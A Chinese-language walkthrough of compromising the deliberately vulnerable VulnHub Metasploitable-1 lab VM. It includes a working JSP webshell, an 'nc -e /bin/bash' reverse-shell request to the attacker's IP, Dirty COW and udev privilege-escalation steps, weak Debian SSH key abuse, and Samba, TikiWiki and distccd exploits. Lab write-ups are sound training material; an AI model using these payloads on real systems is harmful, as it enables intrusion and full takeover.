总结:tomcat后台getshll,脏牛提权,秘钥对对比ssh免密登录,samba cve-2007-2447,tikiwiki1.9.5,distccd后门CVE-2004-2687,cve-2009-1185提权

目录

下载地址

漏洞分析

信息收集

漏洞1

漏洞2

漏洞3

漏洞4

下载地址

  • Metasploitable.zip (Size: 545 MB)
  • Download (Mirror): https://download.vulnhub.com/metasploitable/Metasploitable.zip

使用方法:解压以后选择vmx后缀的文件,直接选择vm打开就可以了。

漏洞分析

信息收集

1.给靶机设置一个快照

2.fping -agq 192.168.31.0/24  使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注:ip段要看自己的

经过扫描发现了很多端口,这里使用-sV -O重新扫一下。

这里发现了不少感觉可以利用的东西,这里首先我们知道了这是一个linux,然后有三个网站,然后发现其中一个是tomcat的,这个可以稍微注意注意,然后还开启了samba服务这个也是需要注意的。

漏洞1

首先查看第一个网站就是80端口。

It works!这个让我想到了一个漏洞,apache的目录遍历和任意命令执行就是CVE-2021-42013,但是经过尝试并没有发现该漏洞,后面继续寻找并没有发现什么东西,这里查看第二网站发现访问不了,然后看看第三个tomcat。

这里我首先查看有没有后台/manager,但是并没有发现,这里尝试点击旁边发现都是可以登录,这里是用弱口令tomcat/tomcat,都可以登录进去,然后再旁边发现了Tomcat Manager这里看看。

然后再这里我们可以将木马打包上传上去

jsp的可回显马,将他打包成war上传。

<%if("123".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>

然后我们访问

靶机ip/war包名称/jsp马完整名字

http://192.168.31.214:8180/aaa/1.jsp?pwd=123&cmd=id

像上面那样,但是这里查看id发现权限不搞,这里反弹shell回来看看。

http://192.168.31.214:8180/aaa/1.jsp?pwd=123&cmd=nc%20-e%20/bin/bash%20192.168.31.120%204444
//注意不要照抄看看自己的ip

这里很容易就反弹回来了,然后并没有发现什么有用的东西,这里看看内核。

uname -a

经过查询这里提示可以使用脏牛提权这里我们试试。

这里我们将东西下过自己先编译好

g++ -Wall -PEDANTIC -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
或者
make

这里我们将编译好的dcow复制到www目录中

然后开启Python3的临时网站

python3:python3 -m http.server
python2:python - m SimpleHTTPServer#从那边开启那边就是根目录,我这里是/var/www

然后来到靶机这里使用wget复制过去

wget http://192.168.31.120:8000/dcow

但是又出现一个问题就是好像执行不了。

这里接下来去想想其他解决方法,最后在/root/.ssh目录中发现了一个公钥文件,经过学长的提醒知道了这个在低版本中也是可以利用。

因为这里版本较低,然后是猜测存在openssl软件包伪随机数泄露,这里将那个包下载过来。

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
(debian_ssh_rsa_2048_x86.tar.bz2)

这里使用tar jxvf解压,然后来到/rsa/2048目录下面。

grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable *.pub
//使用命令查找

这个对应是有一个私钥文件的,就是没有这个后缀的一个文件。

然后我们直接通过私钥就可以登录了,然后我们直接就登录进root了。

漏洞2

还记得但是我们信息收集的东西吗,里面是还有samba服务的,这里直接使用msf试试。

我这里使用exploit/linux/samba/is_known_pipename盲打了一下,但是没有成功。

这里要善用搜索引擎,这里搜索一下看看有没有什么其他漏洞看看,这里就已经提示了cve-2007-2447,这里查看一下知道了,在msf中可以直接利用是exploit/multi/samba/usermap_script,这里我们看看。

没想到直接就打进去了,还是一个root权限

漏洞3

这里我们继续查看80端口的网站,感觉应该还是有东西的,这里使用dirsearch扫一下目录看看吗,然后就发现了tikiwiki这个可疑目录,我记得这是一个cms,需要注意注意。

这进去以后,发现有一个登录的地方,直接admin/admin就可以搞进去了,但是里面没有发现什么东西,这里我们也知道了,它的版本是tikiwiki1.9.5,这个也算是很早之前的版本了,这里善用搜索引擎。

这里找到一个工具,GitHub上的

//使用git复制过来
git clone https://github.com/caique-garbim/TikiWiki_1.9.5_Exploit//进去
cd TikiWiki_1.9.5_Exploit//然后执行exp
//主要是自己的靶机ip
bash tikiwiki_graph_formula_exec.sh http://192.168.31.214/tikiwiki///然后获得反弹回来的shell
//注意这个也是靶机的ip
nc -vn 192.168.31.214 1337

这里也是直接就把shell反弹回来了。

接下来又是要提权了,这里还是感觉是脏牛提权,这里继续尝试,使用另一个dirty.c,这里因为靶机不知道出什么问题wget下载不过来,这里先下载到本地。

//自己可以在靶机中试试,可以的话,就直接到编译哪一步
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c//使用Python开启临时网站
python3 -m http.server//靶机下载本机的dirty.c过来
//注意要看自己的ip
wget http://192.168.31.120:8000/dirty.c//编译
gcc -pthread dirty.c -lcrypt -o dirty//给权限
chmod +x dirty//执行
./dirty

注意执行以后他就会叫我们输入密码,这里看自己,出现下面那个用户就可以了

这里我的就是firefart:123456

直接另开窗口ssh连接,这里我们看到我们也是root权限了。

漏洞4

之前nmap扫的时候,还发现mysql,这里直接试试,没想到弱口令直接就进去了。

但是经过尝试发现好像这个现在并没有什么卵用,写不了马,执行不了命令,提不了权。

但是在重新nmap时,加入-p-,从而发现了一个新的端口

这里使用nmap自带的漏洞脚本再扫一遍,这时候发现他是有一个cve的漏洞的,这里进入msf看看。

搜索以后还是发现了一个可以利用的,这里进去利用看看。

这里发现可以但是并没有利用成功,这里查看了半天并没有发现有什么不对,这里去github中重新寻找一份工具。

这里找到一个工具,我们直接使用git给他复制过来,记得脚本是需要pwn模块的,没有可以pip安装一下。

https://github.com/k4miyo/CVE-2004-2687

这个就利用成功了,然后就是使用方法,可以-h看一下

--rhost 靶机地址 --rport 漏洞端口 --lhost 自己的ip --lport 设置回显的端口

因为不是最高权限,这里我们要提权,这里还是找一个不一样的提权,这里还是看看内核。

这里我们使用searchsploit查查看。

这里我们看到第三个,我们尝试一下这个,同时也知道了这个是cve-2009-1185.

我们这里就可以看到这个exp的位置。

这里我们复制到桌面,同时使用python开启一个临时网站。

因为那个界面回显是不具体的,这里我们重新反弹一个shell

这时候我们才能wget过来,具体使用步骤可以参考linux内核提权

//wget过来
wget http://192.168.31.120:8000/8572.c//编译
gcc -o 8572 8572.c

但是后面经过尝试是搞不了的,这里使用另一个。

和原来的操作一样复制到桌面上,使用临时网站搞过去。

然后给他执行的权限,chmod +x 8478.sh

然后查看里面知道要netlink这个文件,然后搞里面不是零的pid。

我们要找到 Netlink 套接字的 PID,这个 PID 通常比 UDEVDPID 小1。我们使用 cat /proc/net/netlink 命令来查看 PID,唯一的非0的 PID 就是我们想要的数字。我们可以验证这个 PID 是否正确,使用 ps aux | grep udev 来查看 UDEVDPID

获得pid以后,执行需要等一会,然后就是root了。

Vulnhub metasploitable-1相关推荐

  1. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  2. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  4. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  5. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  6. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  7. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

  8. 靶场练习第二十五天~vulnhub靶场之Raven-2

    一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...

  9. 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

    一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...

  10. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

最新文章

  1. java 中的 Annotation 注解学习笔记
  2. 【连载】优秀程序员的45个习惯之39——架构师必须写代码
  3. spring secrity(二)
  4. 千亿市场竟是蓝海——在线音乐教学产品观察
  5. php删除文见,php如何删除文件夹
  6. Linux 普通用户和超级用户的切换
  7. 记一次library cache lock/library cache pin导致的函数编译hang住分析及处理过程
  8. Mybatis 一连串提问,被面试官吊打了!
  9. STM32L5特性简介 Cortex-M33内核TEE-TrustZone信息安全
  10. SQL注入学习part05:(结合sqli-libs学习:41-50关)
  11. TCP/IP协议体系结构简介
  12. matlab中的点乘与不加点的乘
  13. 网络安全专业名词解释
  14. 温州商学院计算机二级office考试时间,全国计算机二级最新报名通知,注意报名时间,千万别错过!...
  15. 程序员写代码也存在本手、妙手、俗手
  16. ODOO13 有同志留言,想看看QWEB渲染widget实现自定义按钮。今天,他来撩
  17. 3D图形学一:模仿草的运动 – GPU(Pixel Shader Vertex Shader)实现
  18. 我的世界修改服务器头像,我的世界单机模式中怎么使用其他头像 单机模式怎么改头像...
  19. 无线个人通信(WPAN)-蓝牙
  20. 微信小程序首次进入引导提示自定义组件

热门文章

  1. COJ1976-搬运工小明
  2. Qt-登录界面到主界面的跳转
  3. 英语语法学习 7 -- 数词
  4. 超行文本追加省略号影藏内容
  5. java xml annotation_java注解XML
  6. UVA-1579 Matryoshka
  7. maintenance.tpl.php,Prestashop快速手册
  8. 基于区块链智能合约的疫苗溯源系统
  9. Server2012 R2 服务器 搭建AD域服务器
  10. 百度云盘免费视频分享:mysql入门视频教程!